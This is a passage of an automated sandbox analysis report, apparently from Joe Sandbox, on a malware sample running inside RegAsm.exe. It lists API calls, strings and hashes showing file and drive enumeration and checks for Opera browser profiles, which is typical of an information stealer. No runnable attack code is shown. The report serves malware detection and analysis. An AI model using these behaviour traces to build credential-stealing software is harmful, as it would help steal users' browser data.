                                                                                                                                                                                                • API ID: lstrcat$H_prolog$lstrcpy$Findlstrlen$FileHeapmemsetwsprintf$AllocCloseFirstNextProcessSystemTime
                                                                                                                                                                                                • String ID: %s\%s$%s\*
                                                                                                                                                                                                • API String ID: 398052587-2848263008
                                                                                                                                                                                                • Opcode ID: b30466ffbc79659b2e2bfa2b9986d482defda78eb0016d9cb88518bef5779368
                                                                                                                                                                                                • Instruction ID: bef94c3f4399ae371824a42a0da6f2abc892f3b013e021df97c8c0e4b108b331
                                                                                                                                                                                                • Opcode Fuzzy Hash: b30466ffbc79659b2e2bfa2b9986d482defda78eb0016d9cb88518bef5779368
                                                                                                                                                                                                • Instruction Fuzzy Hash: 36818C71D00258AEDF00EBE5DC49FEEBBB9AF19304F00446AF505B3191DB785A58CB65
                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                Function 00414B2E Relevance: 24.6, APIs: 13, Strings: 1, Instructions: 133stringfileCOMMON
                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                APIs
                                                                                                                                                                                                • _EH_prolog.MSVCRT ref: 00414B33
                                                                                                                                                                                                • wsprintfA.USER32 ref: 00414B56
                                                                                                                                                                                                • FindFirstFileA.KERNEL32(?,?), ref: 00414B6D
                                                                                                                                                                                                • StrCmpCA.SHLWAPI(?,00425820), ref: 00414B8F
                                                                                                                                                                                                • StrCmpCA.SHLWAPI(?,00425824), ref: 00414BA9
                                                                                                                                                                                                • lstrcat.KERNEL32(?,?), ref: 00414BDE
                                                                                                                                                                                                • lstrcat.KERNEL32(?), ref: 00414BF1
                                                                                                                                                                                                • lstrcat.KERNEL32(?,?), ref: 00414C05
                                                                                                                                                                                                • lstrcat.KERNEL32(?,?), ref: 00414C15
                                                                                                                                                                                                • lstrcat.KERNEL32(?,00425828), ref: 00414C27
                                                                                                                                                                                                • lstrcat.KERNEL32(?,?), ref: 00414C3B
                                                                                                                                                                                                  • Part of subcall function 0040E912: lstrcpy.KERNEL32(00000000,00000000), ref: 0040E93C
                                                                                                                                                                                                  • Part of subcall function 004061D7: _EH_prolog.MSVCRT ref: 004061DC
                                                                                                                                                                                                  • Part of subcall function 004061D7: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000,?,?,?,?,?,?,?,00000000), ref: 004061FF
                                                                                                                                                                                                  • Part of subcall function 004061D7: GetFileSizeEx.KERNEL32(00000000,?,?,?,?,?,?,?,?,00000000), ref: 00406216
                                                                                                                                                                                                  • Part of subcall function 004061D7: LocalAlloc.KERNEL32(00000040,?,00000000,00000000,?,?,?,?,?,?,?,00000000), ref: 00406232
                                                                                                                                                                                                  • Part of subcall function 004061D7: ReadFile.KERNEL32(?,00000000,?,?,00000000,?,?,?,?,?,?,?,00000000), ref: 0040624C
                                                                                                                                                                                                  • Part of subcall function 004061D7: CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,00000000), ref: 0040626D
                                                                                                                                                                                                  • Part of subcall function 004010B1: _EH_prolog.MSVCRT ref: 004010B6
                                                                                                                                                                                                  • Part of subcall function 00413452: _EH_prolog.MSVCRT ref: 00413457
                                                                                                                                                                                                  • Part of subcall function 00413452: CreateThread.KERNEL32(00000000,00000000,0041224D,?,00000000,00000000), ref: 004134FD
                                                                                                                                                                                                  • Part of subcall function 00413452: WaitForSingleObject.KERNEL32(00000000,000003E8,?,00000000), ref: 00413505
                                                                                                                                                                                                • FindNextFileA.KERNEL32(00000000,?), ref: 00414CD5
                                                                                                                                                                                                • FindClose.KERNEL32(00000000), ref: 00414CE4
                                                                                                                                                                                                Strings
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 00000001.00000002.2880201060.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                • Associated: 00000001.00000002.2880201060.0000000000434000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2880201060.0000000000438000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2880201060.000000000043C000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2880201060.000000000052C000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2880201060.000000000052F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2880201060.0000000000535000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2880201060.0000000000573000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2880201060.000000000060D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2880201060.000000000063F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_400000_RegAsm.jbxd
                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: lstrcat$File$H_prolog$Find$CloseCreate$AllocFirstHandleLocalNextObjectReadSingleSizeThreadWaitlstrcpywsprintf
                                                                                                                                                                                                • String ID: %s\%s
                                                                                                                                                                                                • API String ID: 2282932919-4073750446
                                                                                                                                                                                                • Opcode ID: d17ec3c26600bd52f5ef96e5e4cbc8889da4d0dd2681947c91fd2a1080613eb5
                                                                                                                                                                                                • Instruction ID: 05727ecc9d7f33b886483cb8d764c8e7b40b9ffdb98e9113d0f3f5e3cb310351
                                                                                                                                                                                                • Opcode Fuzzy Hash: d17ec3c26600bd52f5ef96e5e4cbc8889da4d0dd2681947c91fd2a1080613eb5
                                                                                                                                                                                                • Instruction Fuzzy Hash: CB513071900128ABCF11EBB1DD49EDE7B7DAB49314F0004AAF505E3151E7389755CFA4
                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                Function 00409FBE Relevance: 23.4, APIs: 8, Strings: 5, Instructions: 628fileCOMMON
                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                APIs
                                                                                                                                                                                                • _EH_prolog.MSVCRT ref: 00409FC3
                                                                                                                                                                                                  • Part of subcall function 0040E912: lstrcpy.KERNEL32(00000000,00000000), ref: 0040E93C
                                                                                                                                                                                                  • Part of subcall function 0040EA17: _EH_prolog.MSVCRT ref: 0040EA1C
                                                                                                                                                                                                  • Part of subcall function 0040EA17: lstrcpy.KERNEL32(00000000), ref: 0040EA68
                                                                                                                                                                                                  • Part of subcall function 0040EA17: lstrcat.KERNEL32(?,?), ref: 0040EA72
                                                                                                                                                                                                  • Part of subcall function 0040EA8B: _EH_prolog.MSVCRT ref: 0040EA90
                                                                                                                                                                                                  • Part of subcall function 0040EA8B: lstrlenA.KERNEL32(?,?,?,?,?,0041625D,?,?,00425A60,?,00000000,00425507), ref: 0040EAB8
                                                                                                                                                                                                  • Part of subcall function 0040EA8B: lstrcpy.KERNEL32(00000000), ref: 0040EADF
                                                                                                                                                                                                  • Part of subcall function 0040EA8B: lstrcat.KERNEL32(?,?), ref: 0040EAEA
                                                                                                                                                                                                  • Part of subcall function 0040E9D0: lstrcpy.KERNEL32(00000000,?), ref: 0040EA09
                                                                                                                                                                                                • FindFirstFileA.KERNEL32(00000000,?,00000000,?,\*.*,?,?,00424C06,00000000,?,00000000), ref: 0040A042
                                                                                                                                                                                                • StrCmpCA.SHLWAPI(?,00424E68), ref: 0040A09C
                                                                                                                                                                                                • StrCmpCA.SHLWAPI(?,00424E6C), ref: 0040A0B6
                                                                                                                                                                                                • StrCmpCA.SHLWAPI(00000000,Opera,00424C13,00424C12,00424C0F,00424C0E,00424C0B,00424C0A,00424C07), ref: 0040A149
                                                                                                                                                                                                • StrCmpCA.SHLWAPI(00000000,Opera GX), ref: 0040A15D
                                                                                                                                                                                                • StrCmpCA.SHLWAPI(00000000,Opera Crypto), ref: 0040A171
                                                                                                                                                                                                  • Part of subcall function 00401061: _EH_prolog.MSVCRT ref: 00401066
                                                                                                                                                                                                Strings
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 00000001.00000002.2880201060.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                • Associated: 00000001.00000002.2880201060.0000000000434000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2880201060.0000000000438000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2880201060.000000000043C000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2880201060.000000000052C000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2880201060.000000000052F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2880201060.0000000000535000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2880201060.0000000000573000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2880201060.000000000060D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2880201060.000000000063F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_400000_RegAsm.jbxd
                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: H_prologlstrcpy$lstrcat$FileFindFirstlstrlen
                                                                                                                                                                                                • String ID: 7$Opera$Opera Crypto$Opera GX$\*.*
                                                                                                                                                                                                • API String ID: 3869166975-536343317
                                                                                                                                                                                                • Opcode ID: 3ce71d429e05e21809e9ad90c95f306b7a74d996af67ac7e37ae5550a3f075c4
                                                                                                                                                                                                • Instruction ID: e1e732d37fd29b0b379b404ee0475555f18a85fffeb7a532c0721a1af017c2f0
                                                                                                                                                                                                • Opcode Fuzzy Hash: 3ce71d429e05e21809e9ad90c95f306b7a74d996af67ac7e37ae5550a3f075c4
                                                                                                                                                                                                • Instruction Fuzzy Hash: 0A42C270900288EADF44EBE6C955BDDBBB4AF19308F4044AEE445732C2DB781B1CDB66
                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                Function 1B5BD9E0 Relevance: 23.3, APIs: 8, Strings: 5, Instructions: 564COMMON
                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                Strings
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 00000001.00000002.2885733857.000000001B498000.00000020.00001000.00020000.00000000.sdmp, Offset: 1B490000, based on PE: true
                                                                                                                                                                                                • Associated: 00000001.00000002.2885708310.000000001B490000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2885733857.000000001B491000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2885733857.000000001B5F6000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2885733857.000000001B69D000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2886538230.000000001B69F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2886538230.000000001B6A8000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2886631004.000000001B6D2000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2886655892.000000001B6DA000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2886655892.000000001B6DD000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2886655892.000000001B6DF000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_1b490000_RegAsm.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                • String ID: %s at line %d of [%.10s]$API called with NULL prepared statement$API called with finalized prepared statement$ebead0e7230cd33bcec9f95d2183069565b9e709bf745c9b5db65cc0cbf92c0f$misuse
                                                                                                                                                                                                • API String ID: 0-860711957
                                                                                                                                                                                                • Opcode ID: 3e318108a7eb1c2b47e2f8dd51134a2ec12b1ac5a37419c8402c4cbc62f5f262
                                                                                                                                                                                                • Instruction ID: 976cf6f7c60e5720a38eaf4cbfd8af605e438272e62017ee18e803ca77664f98
                                                                                                                                                                                                • Opcode Fuzzy Hash: 3e318108a7eb1c2b47e2f8dd51134a2ec12b1ac5a37419c8402c4cbc62f5f262
                                                                                                                                                                                                • Instruction Fuzzy Hash: FD1204B49047419BF7208F24CE45BD77BEABF55318F04492CE89987282E776E449CBA3
                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                Function 1B4BB400 Relevance: 21.4, APIs: 8, Strings: 4, Instructions: 367COMMON
                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                Strings
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 00000001.00000002.2885733857.000000001B498000.00000020.00001000.00020000.00000000.sdmp, Offset: 1B490000, based on PE: true
                                                                                                                                                                                                • Associated: 00000001.00000002.2885708310.000000001B490000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2885733857.000000001B491000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2885733857.000000001B5F6000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2885733857.000000001B69D000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2886538230.000000001B69F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2886538230.000000001B6A8000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2886631004.000000001B6D2000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2886655892.000000001B6DA000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2886655892.000000001B6DD000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2886655892.000000001B6DF000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_1b490000_RegAsm.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                • String ID: ASC$DESC$SELECT %s ORDER BY rowid %s$SELECT %s WHERE rowid BETWEEN %lld AND %lld ORDER BY rowid %s
                                                                                                                                                                                                • API String ID: 0-3496276579
                                                                                                                                                                                                • Opcode ID: bd7877f27da4e12b6a7fa398ac2b849e26e184e158dc6f262aeaf5f0e1ee4aec
                                                                                                                                                                                                • Instruction ID: 002fcbd8f7205fbc13bd770a80986e578e3d678181764d1bc55e9c2bf6dfabae
                                                                                                                                                                                                • Opcode Fuzzy Hash: bd7877f27da4e12b6a7fa398ac2b849e26e184e158dc6f262aeaf5f0e1ee4aec
                                                                                                                                                                                                • Instruction Fuzzy Hash: B1C133B59007419FCB218F24D941BEABBE1FF88314F04892EEAD5C6741E73AE545CB62
                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                Function 004148AF Relevance: 21.2, APIs: 8, Strings: 4, Instructions: 151stringCOMMON
                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                APIs
                                                                                                                                                                                                • _EH_prolog.MSVCRT ref: 004148B4
                                                                                                                                                                                                • GetLogicalDriveStringsA.KERNEL32(00000064,?), ref: 00414916
                                                                                                                                                                                                • memset.MSVCRT ref: 00414935
                                                                                                                                                                                                • GetDriveTypeA.KERNEL32(?), ref: 0041493E
                                                                                                                                                                                                • lstrcpy.KERNEL32(?,00000000), ref: 0041495E
                                                                                                                                                                                                • lstrcpy.KERNEL32(?,00000000), ref: 0041497C
                                                                                                                                                                                                  • Part of subcall function 004010B1: _EH_prolog.MSVCRT ref: 004010B6
                                                                                                                                                                                                  • Part of subcall function 00414462: _EH_prolog.MSVCRT ref: 00414467
                                                                                                                                                                                                  • Part of subcall function 00414462: wsprintfA.USER32 ref: 0041448D
                                                                                                                                                                                                  • Part of subcall function 00414462: FindFirstFileA.KERNEL32(?,?), ref: 004144A4
                                                                                                                                                                                                  • Part of subcall function 00414462: memset.MSVCRT ref: 004144BB
                                                                                                                                                                                                  • Part of subcall function 00414462: memset.MSVCRT ref: 004144C9
                                                                                                                                                                                                  • Part of subcall function 00414462: StrCmpCA.SHLWAPI(?,00425798), ref: 004144E7
                                                                                                                                                                                                  • Part of subcall function 00414462: StrCmpCA.SHLWAPI(?,0042579C), ref: 00414501
                                                                                                                                                                                                  • Part of subcall function 00414462: wsprintfA.USER32 ref: 00414525
                                                                                                                                                                                                  • Part of subcall function 00414462: StrCmpCA.SHLWAPI(?,004254AE), ref: 00414536
                                                                                                                                                                                                  • Part of subcall function 00414462: wsprintfA.USER32 ref: 0041455C
                                                                                                                                                                                                  • Part of subcall function 00414462: memset.MSVCRT ref: 00414582
                                                                                                                                                                                                  • Part of subcall function 00414462: lstrcat.KERNEL32(?,?), ref: 00414594
                                                                                                                                                                                                  • Part of subcall function 00414462: strtok_s.MSVCRT ref: 004145CD
                                                                                                                                                                                                  • Part of subcall function 00414462: memset.MSVCRT ref: 004145E2
                                                                                                                                                                                                  • Part of subcall function 00414462: lstrcat.KERNEL32(?,?), ref: 004145F7
                                                                                                                                                                                                • lstrcpy.KERNEL32(?,00000000), ref: 0041499F
                                                                                                                                                                                                • lstrlenA.KERNEL32(?), ref: 00414A04
                                                                                                                                                                                                Strings
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 00000001.00000002.2880201060.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                • Associated: 00000001.00000002.2880201060.0000000000434000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2880201060.0000000000438000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2880201060.000000000043C000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2880201060.000000000052C000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2880201060.000000000052F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2880201060.0000000000535000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2880201060.0000000000573000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2880201060.000000000060D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2880201060.000000000063F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_400000_RegAsm.jbxd
                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: memset$H_prologlstrcpywsprintf$Drivelstrcat$FileFindFirstLogicalStringsTypelstrlenstrtok_s
                                                                                                                                                                                                • String ID: %DRIVE_FIXED%$%DRIVE_REMOVABLE%$*%DRIVE_FIXED%*$*%DRIVE_REMOVABLE%*
                                                                                                                                                                                                • API String ID: 2879972474-147700698
                                                                                                                                                                                                • Opcode ID: dea699d93c927df95dbeaac62c2028c535e1bb0fcf2e88180d2f4ce7ca951026
                                                                                                                                                                                                • Instruction ID: ce69cf5d705c68102b196c23c8b494e358ccabe1c6d03937ad45a626c66a4bdb
                                                                                                                                                                                                • Opcode Fuzzy Hash: dea699d93c927df95dbeaac62c2028c535e1bb0fcf2e88180d2f4ce7ca951026
                                                                                                                                                                                                • Instruction Fuzzy Hash: AF5181B1900258AADF20EFB1DC46EEF7B7DEF51304F50042AF505A2192DB385A85CB65
                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                Function 00401162 Relevance: 20.0, APIs: 9, Strings: 2, Instructions: 771fileCOMMON
                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                APIs
                                                                                                                                                                                                • _EH_prolog.MSVCRT ref: 00401167
                                                                                                                                                                                                  • Part of subcall function 0040E912: lstrcpy.KERNEL32(00000000,00000000), ref: 0040E93C
                                                                                                                                                                                                • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,00421374,?,?,?,00421370,?,?,00000000,?,00000000), ref: 004013AC
                                                                                                                                                                                                • StrCmpCA.SHLWAPI(?,00421378), ref: 004013CA
                                                                                                                                                                                                • StrCmpCA.SHLWAPI(?,0042137C), ref: 004013E4
                                                                                                                                                                                                • FindFirstFileA.KERNEL32(00000000,?,?,?,?,00421388,?,?,?,00421384,?,?,?,00421380,?,?), ref: 00401510
                                                                                                                                                                                                  • Part of subcall function 0040FD0C: SHGetFolderPathA.SHELL32(00000000,{LB,00000000,00000000,?), ref: 0040FD3D
                                                                                                                                                                                                  • Part of subcall function 0040EA17: _EH_prolog.MSVCRT ref: 0040EA1C
                                                                                                                                                                                                  • Part of subcall function 0040EA17: lstrcpy.KERNEL32(00000000), ref: 0040EA68
                                                                                                                                                                                                  • Part of subcall function 0040EA17: lstrcat.KERNEL32(?,?), ref: 0040EA72
                                                                                                                                                                                                  • Part of subcall function 0040E9D0: lstrcpy.KERNEL32(00000000,?), ref: 0040EA09
                                                                                                                                                                                                  • Part of subcall function 0040EA8B: _EH_prolog.MSVCRT ref: 0040EA90
                                                                                                                                                                                                  • Part of subcall function 0040EA8B: lstrlenA.KERNEL32(?,?,?,?,?,0041625D,?,?,00425A60,?,00000000,00425507), ref: 0040EAB8
                                                                                                                                                                                                  • Part of subcall function 0040EA8B: lstrcpy.KERNEL32(00000000), ref: 0040EADF
                                                                                                                                                                                                  • Part of subcall function 0040EA8B: lstrcat.KERNEL32(?,?), ref: 0040EAEA
                                                                                                                                                                                                  • Part of subcall function 0040FB47: _EH_prolog.MSVCRT ref: 0040FB4C
                                                                                                                                                                                                  • Part of subcall function 0040FB47: GetSystemTime.KERNEL32(?,004253D8,00000000,00000001,00000000,00425502,004254FF), ref: 0040FB8C
                                                                                                                                                                                                  • Part of subcall function 0040E949: lstrcpy.KERNEL32(00000000,FEE8858D), ref: 0040E96F
                                                                                                                                                                                                  • Part of subcall function 004061D7: _EH_prolog.MSVCRT ref: 004061DC
                                                                                                                                                                                                  • Part of subcall function 004061D7: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000,?,?,?,?,?,?,?,00000000), ref: 004061FF
                                                                                                                                                                                                  • Part of subcall function 004061D7: GetFileSizeEx.KERNEL32(00000000,?,?,?,?,?,?,?,?,00000000), ref: 00406216
                                                                                                                                                                                                  • Part of subcall function 004061D7: LocalAlloc.KERNEL32(00000040,?,00000000,00000000,?,?,?,?,?,?,?,00000000), ref: 00406232
                                                                                                                                                                                                  • Part of subcall function 004061D7: ReadFile.KERNEL32(?,00000000,?,?,00000000,?,?,?,?,?,?,?,00000000), ref: 0040624C
                                                                                                                                                                                                  • Part of subcall function 004061D7: CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,00000000), ref: 0040626D
                                                                                                                                                                                                • FindNextFileA.KERNEL32(00000000,?,?,?,?,?,?,0042138C), ref: 00401832
                                                                                                                                                                                                • FindClose.KERNEL32(00000000,?,?,?,?,?,0042138C), ref: 00401841
                                                                                                                                                                                                • FindNextFileA.KERNEL32(?,?), ref: 00401BD4
                                                                                                                                                                                                • FindClose.KERNEL32(?), ref: 00401BE5
                                                                                                                                                                                                  • Part of subcall function 004010B1: _EH_prolog.MSVCRT ref: 004010B6
                                                                                                                                                                                                  • Part of subcall function 00413452: _EH_prolog.MSVCRT ref: 00413457
                                                                                                                                                                                                  • Part of subcall function 00413452: CreateThread.KERNEL32(00000000,00000000,0041224D,?,00000000,00000000), ref: 004134FD
                                                                                                                                                                                                  • Part of subcall function 00413452: WaitForSingleObject.KERNEL32(00000000,000003E8,?,00000000), ref: 00413505
                                                                                                                                                                                                  • Part of subcall function 0040FCC8: _EH_prolog.MSVCRT ref: 0040FCCD
                                                                                                                                                                                                  • Part of subcall function 0040FCC8: GetFileAttributesA.KERNEL32(00000000,?,0040CB40,?,?,?,?), ref: 0040FCE1
                                                                                                                                                                                                  • Part of subcall function 004061D7: LocalFree.KERNEL32(?,?,?,?,?,?,?,?,00000000), ref: 00406262
                                                                                                                                                                                                  • Part of subcall function 00413452: Sleep.KERNEL32(000003E8,?,?,?,?,?,00000000), ref: 004134DB
                                                                                                                                                                                                Strings
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 00000001.00000002.2880201060.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                • Associated: 00000001.00000002.2880201060.0000000000434000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2880201060.0000000000438000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2880201060.000000000043C000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2880201060.000000000052C000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2880201060.000000000052F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2880201060.0000000000535000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2880201060.0000000000573000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2880201060.000000000060D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2880201060.000000000063F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_400000_RegAsm.jbxd
                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: FileH_prolog$Find$lstrcpy$Close$CreateFirstLocalNextlstrcat$AllocAttributesFolderFreeHandleObjectPathReadSingleSizeSleepSystemThreadTimeWaitlstrlen
                                                                                                                                                                                                • String ID: 7$\*.*
                                                                                                                                                                                                • API String ID: 40499504-4165053604
                                                                                                                                                                                                • Opcode ID: 132a3c05a3bd8f49082d57ca7b7f0a4d0874e8a83fa622a835e5837a80e4067f
                                                                                                                                                                                                • Instruction ID: 241fb47fad9d9fe79bc5b8d9739354b8124c7a3dae7548d836a13d901bd10fce
                                                                                                                                                                                                • Opcode Fuzzy Hash: 132a3c05a3bd8f49082d57ca7b7f0a4d0874e8a83fa622a835e5837a80e4067f
                                                                                                                                                                                                • Instruction Fuzzy Hash: CB628070904288EADB05E7E6C955FDDBBB86F29308F5044AEE446731C2DB781B4CCB66
                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                Function 1B50DB10 Relevance: 18.3, APIs: 12, Instructions: 265COMMON
                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 00000001.00000002.2885733857.000000001B498000.00000020.00001000.00020000.00000000.sdmp, Offset: 1B490000, based on PE: true
                                                                                                                                                                                                • Associated: 00000001.00000002.2885708310.000000001B490000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2885733857.000000001B491000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2885733857.000000001B5F6000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2885733857.000000001B69D000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2886538230.000000001B69F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2886538230.000000001B6A8000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2886631004.000000001B6D2000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2886655892.000000001B6DA000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2886655892.000000001B6DD000.00000002.00001000.00020000.00000000.sdmpDownload File
